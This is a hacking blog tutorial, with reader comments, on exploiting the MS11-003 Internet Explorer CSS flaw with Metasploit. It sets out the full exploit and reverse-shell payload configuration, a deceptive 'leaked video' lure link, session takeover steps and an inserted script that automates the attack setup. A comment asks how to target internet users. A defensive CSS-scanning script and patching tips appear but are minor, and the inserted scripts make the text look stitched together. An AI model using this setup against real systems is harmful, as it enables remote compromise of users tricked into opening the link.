Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5
Victim O.S : Windows 7 SP 1
Victim Browser : Internet Explorer 8
Microsoft Internet Explorer has yet another vulnerability, added to the long list already found by security researchers. The flaw addressed by MS11-003 was published on February 8, 2011 in the corresponding Microsoft security bulletin.
In this tutorial we will exploit it with the Metasploit module ms11_003_ie_css_import. According to the Metasploit website:
This module exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.
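The module description above says the trigger is a page whose stylesheet imports itself. As an added example (not part of the original tutorial or of the Metasploit module), here is a small POSIX shell heuristic that a proxy log job or a file scanner could use to flag a stylesheet that @imports itself. The two sample CSS files and their names are constructed for the example; it only catches a direct self-reference by basename, not longer import cycles.

```shell
#!/bin/sh
# Added example: flag a stylesheet that @imports itself, the recursive-import
# shape the module description above relies on. Heuristic only: it catches a
# direct self-reference by basename, not chains like a.css -> b.css -> a.css.

# Print each @import target of a CSS file, one per line, lowercased and
# stripped of url(), quotes and the trailing ';'. Targets with spaces are
# not handled (they are not valid URLs anyway).
css_import_targets() {
    tr 'A-Z' 'a-z' < "$1" \
      | grep -Eo "@import[[:space:]]+(url\([[:space:]]*)?[\"']?[^\"')[:space:];]+" \
      | sed -E "s/^@import[[:space:]]+(url\([[:space:]]*)?[\"']?//"
}

# Return 0 when some @import target's basename equals the file's own name
# (an optional ?query string is ignored), 1 otherwise.
css_imports_self() {
    self=$(basename "$1" | tr 'A-Z' 'a-z')
    # escape ERE metacharacters in the file name before using it as a pattern
    self_re=$(printf '%s' "$self" | sed 's/[].[*^$\\+?(){}|]/\\&/g')
    css_import_targets "$1" | grep -qE "(^|/)${self_re}(\?.*)?$"
}

# Constructed samples in a scratch directory (removed when the script exits).
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed malicious-looking sample: a stylesheet that imports itself
# repeatedly. Only the @import rules, no exploit payload.
printf '@import url("evil.css");\n@import url("evil.css");\n@import url("evil.css");\n@import url("evil.css");\nbody { color: red; }\n' > "$WORK/evil.css"
# Constructed benign sample: ordinary imports of other files.
printf '@import "reset.css";\n@import url(/static/theme.css);\nh1 { margin: 0; }\n' > "$WORK/site.css"

# Report every file passed on the command line.
scan_css() {
    for f in "$@"; do
        if css_imports_self "$f"; then
            echo "ALERT: $f imports itself (recursive @import)"
        else
            echo "ok: $f"
        fi
    done
}
scan_css "$WORK/evil.css" "$WORK/site.css"
```

Point scan_css at the stylesheets a proxy has cached or at a web root; a legitimate stylesheet has no reason to import itself, so any hit is worth a look, while a clean result proves nothing about imports served from other hosts.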
Let's prepare the attack! You need:
1. Metasploit Framework (website)
2. An operating system to run it on (I use Backtrack 5 in this tutorial)
3. The ms11_003_ie_css_import exploit module (it ships with an up-to-date Metasploit; the author also offered a copy on mediafire.com for offline installs)
1. First, update your Metasploit Framework to the latest version with the msfupdate command. If you have no internet connection for the update, copy the downloaded module file into /pentest/exploits/framework3/modules/exploits/windows/browser.
2. Next, load the module with use exploit/windows/browser/ms11_003_ie_css_import. In this tutorial I use the Meterpreter reverse_tcp payload (windows/meterpreter/reverse_tcp), but you can choose another payload to suit your needs.

3. Once the exploit and payload are selected, configure the options. The picture below shows the options I set for this attack.
set srvhost 192.168.8.93 --> the address the exploit's web server listens on; change it to your own IP.
set srvport 80 --> the port that serves the victim's request. Port 80 is the most convincing choice for social engineering because the link looks like an ordinary website, but binding a port below 1024 needs root privileges (the default on Backtrack).
set uripath avril-video-leaked.avi --> the path of the lure; pick something that makes the victim curious enough to open the link. The .avi extension is only bait: the server returns the exploit page, not a video.
set lhost 192.168.8.93 --> the IP address the payload connects back to once the victim is exploited.
set lport 443 --> the port the payload connects back to. It must differ from srvport, since both are bound on the attacker machine.
exploit --> start the exploit; it prints the link to give the victim:
http://192.168.8.93/avril-video-leaked.avi --> this is the URL that will be given to the victim.
4. When the victim opens the malicious link, the attacker console shows the following screenshot.
The screenshot above tells us that the attack succeeded and that the session has been migrated into a notepad.exe process on the victim machine, so it survives if Internet Explorer crashes or is closed.
5. To confirm that we have an active session from the victim, run sessions -l to list active sessions.
6. Looks great! We have an active session. Interact with it using sessions -i 1 and do something with it.
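To make steps 1 to 6 reproducible, here is an added example (not from the original tutorial) of a POSIX shell script that writes the same configuration to an msfconsole resource file and checks the two ports before anything listens. It reuses the tutorial's values (192.168.8.93, srvport 80, lport 443, avril-video-leaked.avi) as defaults; the script itself, its function names and the resource file name are assumptions. The module options it sets (SRVHOST, SRVPORT, URIPATH, LHOST, LPORT, ExitOnSession) are Metasploit's standard ones.

```shell
#!/bin/sh
# Added example (not from the tutorial): generate an msfconsole resource
# script for ms11_003_ie_css_import and sanity-check the ports first.
# Defaults come from the tutorial; override with environment variables.

ATTACKER_IP=${ATTACKER_IP:-192.168.8.93}
SRVPORT=${SRVPORT:-80}                     # exploit web server (step 3)
LPORT=${LPORT:-443}                        # reverse_tcp handler (step 3)
URIPATH=${URIPATH:-avril-video-leaked.avi} # lure path (step 3)
RC_FILE=${RC_FILE:-ms11_003.rc}            # assumed output file name

# Ports below 1024 can only be bound by root. Returns 0 if privileged.
needs_root() { [ "$1" -lt 1024 ]; }

# The web server and the payload handler both live on the attacker box,
# so they must not share a port, and privileged ports need root.
check_ports() {
    if [ "$1" -eq "$2" ]; then
        echo "srvport and lport must differ (both are bound on this host)" >&2
        return 1
    fi
    if needs_root "$1" || needs_root "$2"; then
        if [ "$(id -u)" -ne 0 ]; then
            echo "port $1 or $2 is privileged but msfconsole is not root" >&2
            return 1
        fi
    fi
    return 0
}

# Emit the resource script: module, payload and the options from step 3.
# 'exploit -j' leaves the console free for 'sessions -l' / 'sessions -i 1'.
build_rc() {
    ip=$1 srvport=$2 uripath=$3 lport=$4
    cat <<EOF
use exploit/windows/browser/ms11_003_ie_css_import
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST $ip
set SRVPORT $srvport
set URIPATH $uripath
set LHOST $ip
set LPORT $lport
set ExitOnSession false
exploit -j
EOF
}

# The URL the victim receives; port 80 is implicit in http:// URLs.
lure_url() {
    if [ "$2" -eq 80 ]; then echo "http://$1/$3"; else echo "http://$1:$2/$3"; fi
}

main() {
    check_ports "$SRVPORT" "$LPORT" || return 1
    build_rc "$ATTACKER_IP" "$SRVPORT" "$URIPATH" "$LPORT" > "$RC_FILE"
    echo "wrote $RC_FILE; lure URL: $(lure_url "$ATTACKER_IP" "$SRVPORT" "$URIPATH")"
    echo "start with: msfconsole -r $RC_FILE"
}
main "$@" || echo "fix the settings above and rerun" >&2
```

Run it as root on the attacker box, then start msfconsole -r ms11_003.rc; when a victim opens the lure URL, sessions -l and sessions -i 1 work exactly as in steps 5 and 6.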

PWNED!
1. Keep your browser and operating system patched; the MS11-003 update fixes this flaw.
2. Don't open links you don't recognize or didn't ask for.
Hope it's useful.
Hello, your site is good, I like your tutorials. Please help me with a doubt. I run BT5 on VirtualBox and use Windows 7 and XP VMs for pentesting. While using a browser-based client-side exploit, Metasploit generates a link for us which the target will have to open in his browser so that the exploit runs and we get a session. My question is that the link Metasploit generates is of the form 192.168.56.101:8080 or 10.0.2.15. These two addresses belong to the local network, I hope. Can we target any user on the internet using these browser-based exploits? How can we generate a global link which can be sent to any target?
#darklord
You can view my other tutorial here http://vishnuvalentino.com/computer/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/ about the logic.
Hi Vishu,
Your hidden download link doesn't work (checked in IE, FF, Chrome without any script blockers).
Could you advise how to get it?
Thanks!
#Nikolay
You can click the grey-colored area surrounding my affiliations box.